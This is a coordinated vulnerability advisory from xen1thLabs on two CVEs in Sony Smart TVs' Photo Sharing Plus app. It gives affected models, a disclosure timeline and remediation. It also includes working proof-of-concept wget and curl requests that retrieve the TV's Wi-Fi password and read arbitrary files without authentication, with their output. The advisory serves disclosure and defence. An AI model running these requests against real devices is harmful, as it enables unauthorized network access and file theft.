UNCLASSIFIED ## ADVISORY INFORMATION TITLE: Multiple vulnerabilities in Sony Smart TVs ADVISORY URL: https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/ DATE PUBLISHED: 23/04/2019 AFFECTED VENDORS: Sony RELEASE MODE: Coordinated release CVE: CVE-2019-10886, CVE-2019-11336 CVSSv3 for CVE-2019-10886: 6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) CVSSv3 for CVE-2019-11336: 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) ## PRODUCT DESCRIPTION Sony Smart TVs are provided with applications - adding more functionalities for the customers - including the "Photo Sharing Plus" application. The "Photo Sharing Plus" application running inside the Smart TV contains several weaknesses. This application allows uploading pictures from Smartphone to the TVs, in order to display them on a large screen. When started, Photo Sharing Plus is turning the TV into a Wi-Fi access point and shows a Wi-Fi password allowing customers to connect and share their media content on the Sony Smart TVs. ## DETAILS OF VULNERABILITIES xen1thLabs has found multiple vulnerabilities in Sony products in October 2018 and xen1thLabs coordinated the disclosure of these vulnerabilities with Sony. Two vulnerabilities have been found in the Sony Smart TVs by xen1thLabs while auditing the security of Smart TVs. The first vulnerability allows an attacker - without authentication from the LAN/Wi-Fi - to retrieve the static Wi-Fi password created by the television when the Photo Sharing Plus application is started. The second vulnerability allows an attacker to read arbitrary files located in the TV without authentication including valuable files. The summary of the vulnerabilities is: - CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability - CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability The number of affected Sony models is very high and Sony has decided to remove this vulnerable application from all models (https://www.sony.com/electronics/support/televisions-projectors/articles/00204331). Sony provided a non-exhaustive list of affected TV models from 2015-2016. Recent models also are affected: - KDL-50W800C - KDL-50W805C - KDL-50W807C - KDL-50W809C - KDL-50W820C - KDL-55W800C - KDL-55W805C - KDL-65W850C - KDL-65W855C - KDL-65W857C - KDL-75W850C - KDL-75W855C - XBR-43X830C - XBR-49X800C - XBR-49X830C - XBR-49X835C - XBR-49X837C - XBR-49X839C - XBR-55X805C - XBR-55X807C - XBR-55X809C - XBR-55X810C - XBR-55X850C - XBR-55X855C - XBR-55X857C - XBR-65X800C - XBR-65X805C - XBR-65X807C - XBR-65X809C - XBR-65X810C - XBR-65X850C - XBR-65X855C - XBR-65X857C - XBR-75X850C - XBR-75X855C - XBR-55X900C - XBR-55X905C - XBR-55X907C - XBR-65X900C - XBR-65X905C - XBR-65X907C - XBR-65X930C - XBR-75X910C - XBR-75X940C - XBR-75X945C - XBR-43X800D - XBR-49X800D - XBR-49X835D - XBR-55X850D - XBR-55X855D - XBR-55X857D - XBR-65X850D - XBR-65X855D - XBR-65X857D - XBR-75X850D - XBR-75X855D - XBR-75X857D - XBR-85X850D - XBR-85X855D - XBR-85X857D - XBR-55X930D - XBR-65X930D - XBR-65X935D - XBR-65X937D - XBR-75X940D - XBR-100Z9D - XBR-49X700D - XBR-55X700D - XBR-65X750D - XBR-65Z9D - XBR-75Z9D - XBR-43X800E - XBR-49X800E - XBR-49X900E - XBR-55A1E - XBR-55X800E - XBR-55X806E - XBR-55X900E - XBR-55X930E - XBR-65A1E - XBR-65X850E - XBR-65X900E - XBR-65X930E - XBR-75X850E - XBR-75X900E - XBR-75X940E - XBR-77A1E ### 1. CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability An unauthenticated remote attacker can retrieve the plaintext wireless password through the "Photo Sharing Plus" API. After starting the application, the following example retrieves the wireless password created from the TV (IP address of the TV is 192.168.1.102) over the LAN, without authentication: ``` root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/ {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80} ```` The password is 8362tbwX. By reading logs of the TV, we can confirm the password has been delivered over HTTP, without authentication. The logs contain password in plain-text: ``` 01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80} ```` It is also important to note that the generated Wireless password by the TV is always the same. Even after a hard reboot and a disconnection from the power supply, the generated password will be always the same. This lack of randomness is also a security issue. ### 2. CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability It is possible to retrieve internal TV files over HTTP without authentication. By default, images used by the Photo Sharing Plus application are stored inside `/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/`. The application starts an access point on the television and a HTTP daemon is listening to a TCP port on this WLAN. Furthermore, this daemon also listens on the LAN side of the television and it is possible to retrieve these images from the LAN an image using this URL: http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG Browsing the address http://[ip_tv]:10000/contentshare/image/ allows getting access to the root directory of the television running Android. By exploiting this vulnerability, /default.prop (containing Android properties) can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop: ``` root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop Trying 192.168.1.102... TCP_NODELAY set Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0) > GET /contentshare/image/default.prop HTTP/1.1 > Host: 192.168.1.102:10000 > User-Agent: curl/7.58.0 > Accept: / > < HTTP/1.1 200 OK < Connection: close < Content-Length: 591 < Content-Type: application/octet-stream < # # ADDITIONAL_DEFAULT_PROPERTIES # ro.secure=1 security.perf_harden=1 ro.allow.mock.location=0 ro.debuggable=0 ro.zygote=zygote32 dalvik.vm.image-dex2oat-Xms=64m dalvik.vm.image-dex2oat-Xmx=64m dalvik.vm.dex2oat-Xms=64m dalvik.vm.dex2oat-Xmx=512m ro.dalvik.vm.native.bridge=0 debug.atrace.tags.enableflags=0 # # BOOTIMAGE_BUILD_PROPERTIES # ro.bootimage.build.date=2016? 11? 14? ??? 15:34:56 JST ro.bootimage.build.date.utc=1479105296 ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys persist.sys.usb.config=none Closing connection 0 ```` Logs in the TV confirm the /default.prop file has been delivered over HTTP: ``` 01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop 01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop 01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image 01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop 01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop 01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream 01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591 01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591 01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed. ```` ## DISCLOSURE TIMELINE 03/10/2018 - Vulnerabilities found 10/10/2018 - Report to Sony - Report to Sony Bug bounty program through HackerOne 12/10/2018 - Confirmation of the reception of the bug report 15/10/2018 - xen1thLabs explains that the vulnerabilities are also exploitable over HbbTV (DVB-{S,T,C}) - through HackerOne 29/10/2018 - Sony confirms the vulnerabilities 09/11/2018 - Sony confirms the patches will be available in March 2019 and asks xen1thLabs to wait until April 2019 29/11/2018 - xen1thLabs sent the slides prior to xen1thLabs's HiTB 2018 Dubai talk as agreed with Sony 14/01/2019 - Updates requested from xen1thLabs 15/01/2019 - Sony informs xen1thlabs that they are working on patches 27/01/2019 - Updates requested from xen1thLabs 07/03/2019 - Updates requested from xen1thLabs 15/03/2019 - Sony informs xen1thLabs that the agreed date for disclosure is not possible because they don't know when they will be ready "maybe in a couple of months" 17/03/2019 - Updates requested from Sony to understand and to publish a security advisory. xen1thLabs also requests CVEs officially 20/03/2019 - xen1thLabs asks for an acceptable timeline 21/03/2019 - xen1thLabs sent an email to Secure@xxxxxxxx due to the lack of proper communication from Sony and informing Sony that in order to protect their customers xen1thLabs needs to publish a security advisory 21/03/2019 - Automatic response from Secure@xxxxxxxx is no more in use. 22/03/2019 - Sony is working on the patches and confirms the 12th April 26/03/2019 - xen1thLabs confirms the release date of the advisory and asks for CVEs 01/04/2019 - Sony confirms the vulnerabilities affects some models and "Sony plans to terminate Photo Sharing Plus service for all of models, and that completion date is scheduled for April 12th, 2019." 16/04/2019 - Sony only provides one CVE instead of two. Sony states "the wireless password recovery is within Sony's TV specification and is expected behavior and Sony will not be submitting for a CVE regarding this" 17/04/2019 - xen1thLabs requests a CVE from MITRE 23/04/2019 - Public disclosure ## SOLUTION Apply patches provided by Sony ## CREDITS xen1thLabs - Telecom Lab ## REFERENCES https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/ Firmware update to v6.5830 from 01-22-2019 (including security patches?) https://www.sony.com/electronics/support/downloads/00015771 Firmware update to v6.5830 from 01-22-2019 (not including security patches) https://www.sony.com/electronics/support/downloads/00015770 End of Photo Sharing Plus 11/22/2018 https://www.sony.com/electronics/support/articles/00204331 https://www.darkmatter.ae/xen1thlabs/ sony-smart-tv-photo-sharing-plus-arbitrary-file-read-vulnerability-xl-19-002/ https://www.darkmatter.ae/xen1thlabs/ sony-smart-tv-photo-sharing-plus-information-disclosure-vulnerability-xl-19-003/ ## ABOUT xen1thLabs xen1thLabs conducts vulnerability research, which feeds in the testing and validation activities it conducts across software, hardware and telecommunication. xen1thLabs houses a team of world-class experts dedicated to providing high impact capabilities in cyber security. At xen1thLabs we are committed to uncovering new vulnerabilities that combat tomorrow's threats today. More information about xen1thLabs can be found at: https://www.darkmatter.ae/xen1thlabs/ ## WORKING AT xen1thLabs xen1thLabs is looking for several security researchers across multiple disciplines. Join a great team of likeminded specialists and enjoy all that UAE has to offer! If you are interested please visit: https://www.darkmatter.ae/xen1thlabs/